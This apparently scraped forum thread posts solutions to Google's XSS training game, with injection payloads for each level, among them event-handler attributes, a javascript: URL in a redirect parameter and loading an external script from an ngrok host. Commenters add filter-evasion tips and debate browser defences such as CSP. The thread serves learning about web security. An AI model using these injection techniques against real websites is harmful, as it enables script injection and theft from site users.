I'm posting because I find that whenever I can't solve some security puzzle, it usually means I didn't foresee an attack and I've been writing insecure code :( So hopefully people who get stumped can take a look at the solutions and determine if that's the case for them.
It'd be cool if someone wrote up explanations for each of these w/ links to relevant portions of Google's documentation.
I know you posted on pastbin with 'never' for a reason. But incase they ever shut down, here is the text:
# lvl 1
Enter `<script>alert('')</script>` into the search box.
# lvl 2
Use the `onclick` attribute of the font tag (hint is from the first post, which shows `<font>` might be allowed for the purpose of changing colors. Winning message:
<font color="red" onclick="alert('')">blah</font>
and then click blah after posting the message. (or use onload etc.)
# lvl 3
Modify the URL parameter so that you inject code into the `<img>` tag:
https://xss-game.appspot.com/level3/frame#1.jpg' onclick="alert('')" alt='a picture called 1
which will render as:
html += "<img src='/static/level3/cloud/1.jpg' onclick="alert('')" alt='a picture called 1.jpg'/>";
on line 17 of the HTML file. Now click on the picture.
# lvl 4
Use `3'); alert('` as the value for your timer.
# lvl 5
Notice that if you type `javascript:alert('')` into your browser location bar, an alert will pop up. So we'll use this as the location that the user is sent to on the signup page. Go the the URL:
https://xss-game.appspot.com/level5/frame/signup? next=javascript:alert('')
and then click the `Next` link.
# lvl 6
The regex only notices lowercase https. So upload this JS file to some URL http://mysite.com/xss.js:
alert('');
and then go the the url `https://xss- game.appspot.com/level6/frame#Http://mysite.com/xss.js`
# Notes
In an actual attack you'd use onerror or onload everywhere instead of onclick.
Level 6: You can exclude the protocol entirely (eg: "//news.ycombinator.com")
This will ensure the browser uses the "current protocol" as in if your website is browseable from http all request //www...com will be http and if your page is fetched using https, all resources starting with //www.hn.com will be loaded using https
if your website was reachable from protocol xyz://mydomain.com, all resources starting with // would be fetched using the xyz:// protocol
I tried 110Mb and it actually worked as well! I'm not sure about the real limit.
You can store MASSIVE amounts of data in these things. It also seems to eventually break the url display and reverts to about:blank. It still retains protocol integrity though.
Instead of "onclick" for the <img> tags, you can bypass the required user interaction and be more brutal using "onerror" e.g. <img onerror="alert('hacked')" url="broken_url">.
I just used the industry standard protocol format in the level 6: `#//xxx.ngrok.io/foo.js`. I thought it was hilarious that they didn't filter that out.
Here's a way to by bypass that- point the FF dev tools soley at the iframe, then use the scratchpad to run the alert. It will accept that and let you move past.
I spent 20 minutes thinking I had something horribly wrong until I read this comment.
Even percent-encoding it ends up just including the entire injection as the path (on 50.0). I worked around it for now by editing the element directly in Developer Tools.
If someone has trouble making the exploit work in Chrome: The developer tools replace all ' with " if you inspect the element. Therefore, it misleads you into thinking that the website encloses attributes in " ", whereas instead it is enclosed in ' '.
These challenges are very easy. Anyone who knows something harder? To my knowledge, it's not easy to find material to study/exploit to get better at XSS'ing.
I'm quite surprised that these exploits aren't blocked at the browser level by default with developers having to write code to make the exploits work if they need to.
For example, if browsers flatly refused to load code from an external URL unless the address was whitelisted in the page's HTTP response headers then you'd make level 6's exploit impossible without much of an impact on web development.
The CORS header Access-Control-Allow-Origin can be used to force a browser to work that way, but only if a site sets it. I'm suggesting we're at the point now where browsers should be secure by default, even if it breaks some old sites.
So I was trying to accomplish this in Firefox and couldn't get past level 3. Switched to Chrome and the exact same solution worked just fine. Firefox was URL encoding my single and double quotes so I couldn't break out of the string for the image (if that makes sense). Firefox 50 and Chrome 54.0.2840.98
Chrome's XSS filter can still be circumvented in quite a few instances. The easiest way I've seen is when the attacker controls at least two variables and can split the XSS across them in such a way that neither half appears malicious but when loaded into the page they create a malicious script.
This is possible with the Content Security Policy header, including automated reports from the browsers when things are blocked. It's hard to implement however since a whitelist of allowed domains can grow very, very large for the average site.
Eg if your web app uses embedded Tweets, MixPanel, and GoogleFonts:
var policy = cspByAPI(basePolicy, ['twitter', 'mixpanel', 'googleFonts' ]);
Ie, the package maintains an up to date list of the image, script, etc sources for all those different embeds, so you only have to specify what your own code needs (that's the basePolicy).
It's for node, but you can easily port it to Elixir or Python or Ruby.
Policies for 16 common CSP embeds are included, please send a pull request to add more.
That's the point I'm questioning - I think browsers should block by default and only allow things that are specifically allowed by the CSP (or by CORS).
For better or worse technologists have largely decided that backwards compatibility trumps all unless absolutely necessary. This means ELS for security patches, only non-breaking changes to the web (which is how we ended up with 'use strict' in Javascript), and even if it is "more secure" if it could break some portion of people's websites it must not be done by default, but must be opted into.
I don't personally agree with the decisions - but I can understand why they are made. It's easier to say I'd personally choose to give devs the finger and tell them to fix their code than to actually give devs the finger and tell them to fix/update their code.
> I'm quite surprised that these exploits aren't blocked at the browser level... I'm suggesting we're at the point now where browsers should be secure by default, even if it breaks some old sites.
Some are. But in general, XSS (especially reflected) are not possible to block exclusively at the browser level.
> For example, if browsers flatly refused to load code from an external URL unless the address was whitelisted in the page's HTTP response headers then you'd make level 6's exploit impossible without much of an impact on web development.
You would also break ALOT of sites with a requirement like that. Not to mention the millions of people who has a website but has no idea what an HTTP header even is...
Its pretty normal to include external scripts on a website (CDN for dependencies, tracking like google analytics etc)
The mechanism next=javascript:alert('')
with the column how is it called?
Are there exape of using anything other than javascript before column?
it was a very great tutorial:)
Do you... realize it's actually a live webpage your testing on? It's not like the server checks to see if you wrote exactly the right answer. It just checks to see if an alert is fired. If it didn't work, it's because you didn't do it right.
<script>alert()</script> most certainly works unless you have noscript.
I realize it's JS, but I can see it's just dumbly parsing what I've typed as opposed to eg overloading alert() (which can be done: http://stackoverflow.com/questions/1729501/javascript-overri...) and demonstrating/using best practices in the source code to prevent the JS I type from actually damaging the demo itself.
For something that's really interesting, search Pinterest for "reactjs", and see if you get the "Hack Pinterest" tile as your first result. That was fun to play with!
Thanks. I'll admit this is a field I'm completely unfamiliar with. (I was actually considering bug bounty hunting in the future, thanks for the wake up call.)
I actually noticed the ; was being removed and am very confused as to why, but forgot to mention that in my earlier comment.
Full disclosure: I didn't bother to learn about why the ; is being split. But I can hasten a guess: the python web server treats that as a parameter separator.
I'm posting because I find that whenever I can't solve some security puzzle, it usually means I didn't foresee an attack and I've been writing insecure code :( So hopefully people who get stumped can take a look at the solutions and determine if that's the case for them.
It'd be cool if someone wrote up explanations for each of these w/ links to relevant portions of Google's documentation.